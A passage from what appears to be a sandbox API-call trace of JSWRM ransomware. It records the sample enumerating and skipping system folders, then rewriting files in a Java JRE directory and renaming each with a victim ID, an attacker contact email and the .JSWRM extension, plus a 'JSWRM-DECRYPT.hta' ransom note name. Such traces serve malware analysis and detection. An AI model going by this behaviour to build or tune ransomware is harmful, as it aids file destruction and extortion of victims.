lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0070.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0070.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0070.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0070.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0070.151] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa8546b2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xaa8546b2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xaa8ed01b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x21a46d, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="localedata.jar", cAlternateFileName="LOCALE~1.JAR")) returned 1 [0070.151] lstrcmpiW (lpString1="localedata.jar", lpString2=".") returned 1 [0070.151] lstrcmpiW (lpString1="localedata.jar", lpString2="..") returned 1 [0070.151] lstrcmpiW (lpString1="localedata.jar", lpString2="...") returned 1 [0070.151] lstrcmpiW (lpString1="localedata.jar", lpString2="windows") returned -1 [0070.151] lstrcmpiW (lpString1="localedata.jar", lpString2="recovery") returned -1 [0070.151] lstrcmpiW (lpString1="localedata.jar", lpString2="perflogs") returned -1 [0070.151] lstrcmpiW (lpString1="localedata.jar", lpString2="documents and settings") returned 1 [0070.151] lstrcmpiW (lpString1="localedata.jar", lpString2="$RECYCLE.BIN") returned 1 [0070.151] lstrcmpiW (lpString1="localedata.jar", lpString2="system volume information") returned -1 [0070.151] lstrcmpiW (lpString1="localedata.jar", lpString2="msocache") returned -1 [0070.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0070.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="localedata.jar", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0070.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="localedata.jar", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="localedata.jar", lpUsedDefaultChar=0x0) returned 14 [0070.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0070.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0070.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="localedata.jar", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0070.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="localedata.jar", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="localedata.jar", lpUsedDefaultChar=0x0) returned 14 [0070.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0070.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0070.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0070.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0070.151] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\localedata.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.152] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2204781) returned 1 [0070.152] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0070.152] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0070.166] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.166] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0070.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.167] CloseHandle (hObject=0x458) returned 1 [0070.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0070.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0070.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0070.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0070.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0070.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0070.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f030 [0070.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.167] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\localedata.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\localedata.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0070.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0070.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0070.168] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x5b5, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="meta-index", cAlternateFileName="META-I~1")) returned 1 [0070.168] lstrcmpiW (lpString1="meta-index", lpString2=".") returned 1 [0070.168] lstrcmpiW (lpString1="meta-index", lpString2="..") returned 1 [0070.168] lstrcmpiW (lpString1="meta-index", lpString2="...") returned 1 [0070.168] lstrcmpiW (lpString1="meta-index", lpString2="windows") returned -1 [0070.168] lstrcmpiW (lpString1="meta-index", lpString2="recovery") returned -1 [0070.168] lstrcmpiW (lpString1="meta-index", lpString2="perflogs") returned -1 [0070.168] lstrcmpiW (lpString1="meta-index", lpString2="documents and settings") returned 1 [0070.168] lstrcmpiW (lpString1="meta-index", lpString2="$RECYCLE.BIN") returned 1 [0070.168] lstrcmpiW (lpString1="meta-index", lpString2="system volume information") returned -1 [0070.168] lstrcmpiW (lpString1="meta-index", lpString2="msocache") returned -1 [0070.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0070.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="meta-index", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0070.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="meta-index", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="meta-index", lpUsedDefaultChar=0x0) returned 10 [0070.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0070.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0070.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="meta-index", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0070.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="meta-index", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="meta-index", lpUsedDefaultChar=0x0) returned 10 [0070.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0070.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0070.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0070.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0070.168] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\meta-index"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.169] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1461) returned 1 [0070.169] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5b0) returned 0x23fc98 [0070.169] ReadFile (in: hFile=0x458, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x5b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x5b0, lpOverlapped=0x0) returned 1 [0070.173] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.173] WriteFile (in: hFile=0x458, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x5b0, lpOverlapped=0x0) returned 1 [0070.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0070.173] CloseHandle (hObject=0x458) returned 1 [0070.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0070.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0070.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0070.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0070.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0070.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0070.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23fa98 [0070.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.174] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\meta-index"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\meta-index.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0070.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0070.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0070.175] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1edd4e, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="nashorn.jar", cAlternateFileName="")) returned 1 [0070.175] lstrcmpiW (lpString1="nashorn.jar", lpString2=".") returned 1 [0070.175] lstrcmpiW (lpString1="nashorn.jar", lpString2="..") returned 1 [0070.175] lstrcmpiW (lpString1="nashorn.jar", lpString2="...") returned 1 [0070.175] lstrcmpiW (lpString1="nashorn.jar", lpString2="windows") returned -1 [0070.175] lstrcmpiW (lpString1="nashorn.jar", lpString2="recovery") returned -1 [0070.175] lstrcmpiW (lpString1="nashorn.jar", lpString2="perflogs") returned -1 [0070.175] lstrcmpiW (lpString1="nashorn.jar", lpString2="documents and settings") returned 1 [0070.175] lstrcmpiW (lpString1="nashorn.jar", lpString2="$RECYCLE.BIN") returned 1 [0070.175] lstrcmpiW (lpString1="nashorn.jar", lpString2="system volume information") returned -1 [0070.175] lstrcmpiW (lpString1="nashorn.jar", lpString2="msocache") returned 1 [0070.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0070.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nashorn.jar", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0070.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nashorn.jar", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nashorn.jar", lpUsedDefaultChar=0x0) returned 11 [0070.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0070.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0070.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nashorn.jar", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0070.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nashorn.jar", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nashorn.jar", lpUsedDefaultChar=0x0) returned 11 [0070.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0070.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0070.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0070.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0070.176] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\nashorn.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.178] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2022734) returned 1 [0070.178] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0070.178] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0070.191] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.191] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0070.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.192] CloseHandle (hObject=0x458) returned 1 [0070.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0070.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0070.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0070.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0070.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0070.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0070.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f4d0 [0070.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.192] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\nashorn.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\nashorn.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0070.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0070.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0070.193] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xa4c9, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="sunec.jar", cAlternateFileName="")) returned 1 [0070.193] lstrcmpiW (lpString1="sunec.jar", lpString2=".") returned 1 [0070.193] lstrcmpiW (lpString1="sunec.jar", lpString2="..") returned 1 [0070.193] lstrcmpiW (lpString1="sunec.jar", lpString2="...") returned 1 [0070.193] lstrcmpiW (lpString1="sunec.jar", lpString2="windows") returned -1 [0070.193] lstrcmpiW (lpString1="sunec.jar", lpString2="recovery") returned 1 [0070.193] lstrcmpiW (lpString1="sunec.jar", lpString2="perflogs") returned 1 [0070.193] lstrcmpiW (lpString1="sunec.jar", lpString2="documents 